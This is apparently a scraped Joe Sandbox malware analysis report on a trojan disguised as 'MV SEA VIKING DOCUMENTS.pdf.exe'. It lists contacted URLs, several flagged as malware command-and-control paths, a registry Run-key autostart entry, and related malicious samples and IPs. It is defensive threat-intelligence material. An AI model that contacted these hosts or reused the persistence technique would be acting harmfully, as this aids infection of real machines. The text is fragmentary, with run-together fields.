      http://www.quanqiu55555.com/be4o/0%Avira URL Cloudsafe
      http://www.waktuk.com/be4o/?7nx8=7nN0Wh-H7&h48Hl=ZACv9IykpsLcwv8F8kwPwUzl7gpv2Xu+P+MOxVxbXGrtU1PWc37Ho1yUPVVacpXBvcfu100%Avira URL Cloudmalware
      http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%Avira URL Cloudsafe
      https://www.vaughnediting.com/be4o/?Olnhrn=ongdD4qXjjPP&h48Hl=o5nWsVahRRcZ5g7lskYZzD6T98nAnbLK/jyfa2100%Avira URL Cloudmalware
      http://www.easypeasy.community/be4o/0%Avira URL Cloudsafe
      www.istemnetwork.com/be4o/100%Avira URL Cloudmalware
      http://www.mariachinuevozacatecas24-7.com/be4o/?h48Hl=u3IzMx5ToVDuGGVnzGoQ7VGXCLeqa3ksCgRWKaNdgo4W3sFmKuQ6Eu5/95yvzyZg0zqi&7nx8=7nN0Wh-H70%Avira URL Cloudsafe
      https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%Avira URL Cloudsafe
      https://outlook.comeHost_0%Avira URL Cloudsafe
      http://www.josiemaran-supernatural.com/be4o/100%Avira URL Cloudmalware
      http://www.buresdx.com/be4o/100%Avira URL Cloudmalware
      http://www.ooo-club.com/be4o/?h48Hl=QNRjHLgdDThc6A5oSB9Rp7ktW95Q4+1l/IbqwB8DOvHda+yG2lJr6+bTEkZVhYbPGXKX&GXqXh=YZ_XN00%Avira URL Cloudsafe
      http://www.josiemaran-supernatural.com/be4o/?h48Hl=do8Jf58SEKGGCNGHZbpskk9a9mhTmrx8G+lp6qHzh6DMjzgDqGs60o4ehjqHyuaS4N4w&GXqXh=YZ_XN0100%Avira URL Cloudmalware
      http://www.ooo-club.com/be4o/0%Avira URL Cloudsafe
      http://www.noireimpactcollective.net/be4o/100%Avira URL Cloudmalware
      http://www.vendasdigitaisonline.com/be4o/0%Avira URL Cloudsafe
      http://www.rsxrsh.com/be4o/?h48Hl=Tpp8LERQoafeDPvT4B0Z2/EHkXBIuz7bjHlQVU8N2p3tpS82PcmIpc4MoLsyxaBwDc0d&GXqXh=YZ_XN0100%Avira URL Cloudmalware
      http://www.kaikkistore.com/be4o/?h48Hl=jq9b4c7BaMhD9kdTAddwzOt+LNN1qoIISHwx1xbT8oPDlt6nx7w14q7WGmdhUJs/cSrW&iVP=6lL026g0%Avira URL Cloudsafe
      http://www.4huav946.com/be4o/?h48Hl=iu9SHmJYjlqHSITYxUYF5zd8ZPof8OreVpr1w+DDUlIuWCBWIgIZulFzL5qHxGUDcYYs&w6=ZbFDmL0%Avira URL Cloudsafe
      http://www.janhenningsen.com/be4o/?h48Hl=MXCJfAiixaQW23gb43srtNqd5bs2JuRcGlYNxDXnDFPSUKLWpR3/CyWyuFSDkL8/v7KL&iVP=6lL026g0%Avira URL Cloudsafe
      http://www.mariachinuevozacatecas24-7.com/be4o/0%Avira URL Cloudsafe
      http://www.nagradi7.com/be4o/0%Avira URL Cloudsafe
      https://excel.office.comK0%Avira URL Cloudsafe
      http://www.quanqiu55555.com/be4o/?h48Hl=yMGLhnyeH19jbN+jTVkumEksJ3u99HITZ4h1J3SKUgKf5+hZ4WRN7xEsij25EKwk4NjG&GXqXh=YZ_XN00%Avira URL Cloudsafe
      http://181ue.com/sq.html?entry=0%Avira URL Cloudsafe
      http://www.ooo-club.com/be4o/?h48Hl=QNRjHLgdDThc6A5oSB9Rp7ktW95Q4+1l/IbqwB8DOvHda+yG2lJr6+bTEkZVhYbPGXKX&iVP=6lL026g0%Avira URL Cloudsafe
      https://word.office.comewe0%Avira URL Cloudsafe
      http://www.waktuk.com/be4o/?h48Hl=ZACv9IykpsLcwv8F8kwPwUzl7gpv2Xu+P+MOxVxbXGrtU1PWc37Ho1yUPVVacpXBvcfu&GXqXh=YZ_XN0100%Avira URL Cloudmalware
      http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd0%Avira URL Cloudsafe
      http://www.nagradi7.com/be4o/?h48Hl=kw7dGhb5eKkyCVvAuZmYTQsgnBkQwasXlJHrp3Yi63/vNGhbWFnPnmRrKjdxIJy9M/yz&7nx8=7nN0Wh-H70%Avira URL Cloudsafe
      http://www.fairytalepageants.com/be4o/?h48Hl=i0+Fnnt4E2duUPt43OZuwY3vuaej64lfKZi0K7F4B5AoqOaU2cNQP6t/zkb03XoiZyP6&w6=ZbFDmL0%Avira URL Cloudsafe
      http://www.josiemaran-supernatural.com/be4o/?h48Hl=do8Jf58SEKGGCNGHZbpskk9a9mhTmrx8G+lp6qHzh6DMjzgDqGs60o4ehjqHyuaS4N4w&w6=ZbFDmL100%Avira URL Cloudmalware
      http://www.buresdx.com/be4o/?h48Hl=CBV85lUl5iGXXllmWETcgzTRYTuU0jkLI/xLLa4RVPF6HDjlZoPpCKC/374THXhEpvSN&GXqXh=YZ_XN0100%Avira URL Cloudmalware
      NameIPActiveMaliciousAntivirus DetectionReputation
Name | Malicious | Antivirus Detection | Reputation
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                high
                                                                                                                http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000001.2304568262.0000000000649000.00000020.00000001.01000000.00000007.sdmp, shmhprg0nvltzt.exe, 00000023.00000001.4676961765.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://track.uc.cn/collectfirefox.exe, 00000021.00000002.4634268032.00000000224C2000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://drive.google.com/q-MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2765294903.0000000001A53000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2725523941.0000000001A53000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.ooo-club.comchkdsk.exe, 00000015.00000002.7218671686.000000000613B000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDMV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000001.2304260697.0000000000626000.00000020.00000001.01000000.00000007.sdmp, shmhprg0nvltzt.exe, 00000023.00000001.4676661138.0000000000626000.00000020.00000001.01000000.00000007.sdmpfalse
                                                                                                                      high
                                                                                                                      http://schemas.microexplorer.exe, 00000010.00000000.2497558929.0000000003500000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.2462040165.000000000B060000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.2571623791.000000000AB00000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      http://www.gopher.ftp://ftp.MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000001.2304568262.0000000000649000.00000020.00000001.01000000.00000007.sdmp, shmhprg0nvltzt.exe, 00000023.00000001.4676961765.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://api.msn.com/Eexplorer.exe, 00000010.00000000.2506307780.0000000009921000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2454676516.0000000009921000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2565245502.0000000009921000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2694288500.0000000009921000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdMV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000001.2303676581.00000000005F2000.00000020.00000001.01000000.00000007.sdmp, shmhprg0nvltzt.exe, 00000023.00000001.4676216902.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrantexplorer.exe, 00000010.00000000.2453881072.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2505609208.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2693591721.0000000009890000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://www.vaughnediting.com/be4o/?Olnhrn=ongdD4qXjjPP&h48Hl=o5nWsVahRRcZ5g7lskYZzD6T98nAnbLK/jyfa2chkdsk.exe, 00000015.00000002.7218059463.0000000005AC2000.00000004.10000000.00040000.00000000.sdmptrue
                                                                                                                          • Avira URL Cloud: malware
                                                                                                                          unknown
                                                                                                                          https://doc-04-08-docs.googleusercontent.com/2MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2435436962.0000000001A88000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2726590040.0000000001A88000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2760502494.0000000001A88000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2766050247.0000000001A88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://drive.google.com/MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2765294903.0000000001A53000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2725523941.0000000001A53000.00000004.00000020.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000003.4811980051.0000000001A4E000.00000004.00000020.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000003.4810200786.0000000001A4E000.00000004.00000020.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4819570976.0000000001A4F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://outlook.com#explorer.exe, 00000010.00000000.2576182056.000000000D498000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2517426935.000000000D498000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2465323717.000000000D498000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2706242156.000000000D498000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://hm.baidu.com/hm.js?firefox.exe, 00000021.00000002.4634268032.00000000224C2000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexeexplorer.exe, 00000010.00000000.2466445411.000000000D574000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2707742528.000000000D574000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2577458976.000000000D574000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2518578539.000000000D574000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000001.2304568262.0000000000649000.00000020.00000001.01000000.00000007.sdmp, shmhprg0nvltzt.exe, 00000023.00000001.4676961765.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    https://outlook.comeHost_explorer.exe, 00000010.00000000.2474470523.000000000F630000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2588479333.000000000F630000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2720941353.000000000F631000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2528229017.000000000F630000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    low
                                                                                                                                    https://doc-04-08-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v3j65rcqMV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2766050247.0000000001A88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://wns.windows.com/explorer.exe, 00000010.00000000.2530505129.000000000F7E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2476388852.000000000F7E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2723471084.000000000F7E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2590547531.000000000F7E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svgexplorer.exe, 00000010.00000000.2453881072.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2505609208.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2693591721.0000000009890000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filminexplorer.exe, 00000010.00000000.2453881072.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2505609208.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2693591721.0000000009890000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://pre-mpnewyear.uc.cn/iceberg/page/log?domain=firefox.exe, 00000021.00000002.4634268032.00000000224C2000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/explorer.exe, 00000010.00000000.2453881072.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2505609208.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2693591721.0000000009890000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://aka.ms/odirmBexplorer.exe, 00000010.00000000.2564854686.00000000098CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2454229324.00000000098CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2505897529.00000000098CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2693885884.00000000098CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://nsis.sf.net/NSIS_ErrorErrorMV SEA VIKING DOCUMENTS.pdf.exe, shmhprg0nvltzt.exe.16.drfalse
                                                                                                                                                    high
                                                                                                                                                    http://www.foreca.comexplorer.exe, 00000010.00000000.2453881072.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2505609208.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2693591721.0000000009890000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://api.msn.com/v1/news/Feed/Windows?5explorer.exe, 00000010.00000000.2474470523.000000000F630000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2588479333.000000000F630000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2720941353.000000000F631000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2528229017.000000000F630000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://api.msn.com:443/v1/news/Feed/Windows?Aexplorer.exe, 00000010.00000000.2474470523.000000000F630000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2588479333.000000000F630000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2720941353.000000000F631000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2528229017.000000000F630000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://doc-04-08-docs.googleusercontent.com/F$gshmhprg0nvltzt.exe, 00000023.00000003.4809179643.0000000001AA0000.00000004.00000020.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4819975217.0000000001AA0000.00000004.00000020.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000003.4806866586.0000000001A99000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://doc-04-08-docs.googleusercontent.com/xMV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2435436962.0000000001A88000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2726590040.0000000001A88000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2760502494.0000000001A88000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2766050247.0000000001A88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&oexplorer.exe, 00000010.00000000.2453881072.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2505609208.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2693591721.0000000009890000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://excel.office.comKexplorer.exe, 00000010.00000000.2576182056.000000000D498000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2517426935.000000000D498000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2465323717.000000000D498000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2706242156.000000000D498000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                unknown
                                                                                                                                                                http://181ue.com/sq.html?entry=firefox.exe, 00000021.00000002.4634268032.00000000224C2000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                unknown
                                                                                                                                                                https://word.office.comeweexplorer.exe, 00000010.00000000.2474470523.000000000F630000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2588479333.000000000F630000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2720941353.000000000F631000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2528229017.000000000F630000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                unknown
                                                                                                                                                                https://android.notify.windows.com/iOS4explorer.exe, 00000010.00000000.2476687824.000000000F80D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2530734369.000000000F80E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2590759572.000000000F80E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://doc-04-08-docs.googleusercontent.com/yeMV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2435436962.0000000001A88000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2726590040.0000000001A88000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2760502494.0000000001A88000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2766050247.0000000001A88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://android.notify.windows.com/iOSexplorer.exe, 00000010.00000000.2590759572.000000000F80E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdMV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000001.2303676581.00000000005F2000.00000020.00000001.01000000.00000007.sdmp, shmhprg0nvltzt.exe, 00000023.00000001.4676216902.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      https://api.msn.com/explorer.exe, 00000010.00000000.2506307780.0000000009921000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2454676516.0000000009921000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2565245502.0000000009921000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2694288500.0000000009921000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://doc-04-08-docs.googleusercontent.com/bAMV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2432523941.0000000001AA0000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2766276229.0000000001AA4000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2759710918.0000000001A9F000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2724756121.0000000001AA3000.00000004.00000020.00020000.00000000.sdmpfalse
IP  Domain  Country  Flag  ASN  ASN Name  Malicious
Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 575819
Start date: 21.02.2022
Start time: 16:47:53
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 17m 40s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: MV SEA VIKING DOCUMENTS.pdf.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name: Suspected Instruction Hammering
Number of analysed new started processes analysed: 41
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
                                                                                                                                                                                    Technologies:
                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                    • HDC enabled
                                                                                                                                                                                    • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@20/9@62/23
                                                                                                                                                                                    EGA Information:
                                                                                                                                                                                    • Successful, ratio: 100%
HDC Information: Failed
                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                    • Successful, ratio: 99%
                                                                                                                                                                                    • Number of executed functions: 202
                                                                                                                                                                                    • Number of non-executed functions: 165
                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                    • Adjust boot time
                                                                                                                                                                                    • Enable AMSI
                                                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                                                    • Exclude process from analysis (whitelisted): taskhostw.exe, MusNotification.exe, dllhost.exe, consent.exe, UserOOBEBroker.exe, RuntimeBroker.exe, SIHClient.exe, backgroundTaskHost.exe, MusNotificationUx.exe, audiodg.exe, BackgroundTransferHost.exe, ShellExperienceHost.exe, WMIADAP.exe, svchost.exe
                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 20.82.19.171, 52.147.223.103
                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, slscr.update.microsoft.com, tile-service.weather.microsoft.com, wd-prod-cp-us-east-2-fe.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, wdcp.microsoft.com, arc.msn.com, wd-prod-cp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, ris.api.iris.microsoft.com, wdcpalt.microsoft.com, login.live.com, wd-prod-cp-eu-west-2-fe.westeurope.cloudapp.azure.com, img-prod-cms-rt-microsoft-com.akamaized.net
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
Time      Type       Description
16:53:46  Autostart  Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 1BIHHVSHQZC C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe
16:53:54  Autostart  Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 1BIHHVSHQZC C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe
Match  Associated Sample Name / URL  SHA 256  Detection  Link  Context
                                                                                                                                                                                    New -PO January.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                    • www.merchandisingpremium.com/kgw/?y488D=PXWbyoUzr4MJinE4GWmQER2GvkxLFP7ZxA7zcsAdloYaMpm0+Ia9+8OgHYWAj44PGeVKiA==&_L34=kt84IRmHLXo
                                                                                                                                                                                    PRODUCT INQUIRY BNQ1.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                    • www.4winner.xyz/coz3/?RFN4=FzJRfMhRMKbZZb1P0fjURHKUBPNrbzlUUrVaU7rnUM0+6b/b9R1IlXJUUDQo3ufkoD7CqQ==&RB=NL00JzKhBv9HkNRp
                                                                                                                                                                                    New Additional Agreement.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • www.candleish.com/bw82/?8p=HzkSLFojSME3Bv2BRvsWxyeIaLE0Ahb/E/vGPx+3dizfQAeoNzC3oLrNAv5ZQdjmcdMFR+JtKQ==&Bh=H0GxrDp
                                                                                                                                                                                    Qaizen19.10.2020.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • www.onfunerals.net/dn87/?uV0xpr=OPfuvpkPgXuNNyPKiMIIexDYDnMJ5972QfRTwhIurpIeU7r1I5tVqFnt6OT4nh1SyNyl&0r_4=vDKxhJ1xlHYTRvA
                                                                                                                                                                                    New Purchase Order 50,689$.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • www.4winner.xyz/eao/?Yvux40tX=2eKuYykfKT6E0YrQApY5J4vDJiqOigtFaVbxWGoO7nVxUHKG519x/DeD7eAt21vA2f7Y&Pp=jfLprdxxs
                                                                                                                                                                                    Rechnungsbeleg.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                    • www.getscholardollars.com/d2w/
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                                                                                                                                    apep.x86Get hashmaliciousBrowse
                                                                                                                                                                                    • 154.21.136.158
                                                                                                                                                                                    n1QctxXsbNGet hashmaliciousBrowse
                                                                                                                                                                                    • 154.24.217.175
                                                                                                                                                                                    N698PtJ97OGet hashmaliciousBrowse
                                                                                                                                                                                    • 154.42.56.67
                                                                                                                                                                                    bFSG6nzHxTGet hashmaliciousBrowse
                                                                                                                                                                                    • 154.60.6.228
                                                                                                                                                                                    hSVdBsYfVZGet hashmaliciousBrowse
                                                                                                                                                                                    • 154.18.45.173
                                                                                                                                                                                    MPmlYCqcu5Get hashmaliciousBrowse
                                                                                                                                                                                    • 38.116.189.128
                                                                                                                                                                                    igBoEOxQatGet hashmaliciousBrowse
                                                                                                                                                                                    • 154.28.148.127
                                                                                                                                                                                    yLtgB0ly0lGet hashmaliciousBrowse
                                                                                                                                                                                    • 154.29.84.53
                                                                                                                                                                                    apep.arm7Get hashmaliciousBrowse
                                                                                                                                                                                    • 154.42.81.26
                                                                                                                                                                                    2QMYcuMjVdGet hashmaliciousBrowse
                                                                                                                                                                                    • 206.0.89.195
                                                                                                                                                                                    ZFfFGabP4PGet hashmaliciousBrowse
                                                                                                                                                                                    • 66.28.136.42
                                                                                                                                                                                    BdsJPbiWybGet hashmaliciousBrowse
                                                                                                                                                                                    • 38.230.129.84
Match | Associated Sample Name / URL | Detection
C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll | MV SEA VIKING DOCUMENTS.pdf.exe | malicious
 | IMG140202214020221402022.exe | malicious
 | Liquidacin por Factorizacin de Crditos.exe | malicious
 | Liquidacin por Factorizacin de Crditos.exe | malicious
 | 36PzmSKXoT.exe | malicious
 | 36PzmSKXoT.exe | malicious
 | TNT Invoice 21-02-2022#U00b7pdf.exe | malicious
 | TNT Invoice 21-02-2022#U00b7pdf.exe | malicious
 | Order (965155).exe | malicious
 | Order (965155).exe | malicious
 | b4#Uc6a9.exe | malicious
 | CDH_0302 pdf.exe | malicious
 | CDH_0302 pdf.exe | malicious
 | OFERTA ALSSET.exe | malicious
 | OFERTA ALSSET.exe | malicious
 | OFERTA ALSSET.exe | malicious
 | Invitation To Quote 17-02-2022#U00b7pdf.exe | malicious
 | Invitation to Quote 17-02-2022#U00b7pdf.exe | malicious
 | Invitation To Quote 17-02-2022#U00b7pdf.exe | malicious
 | Invitation to Quote 17-02-2022#U00b7pdf.exe | malicious
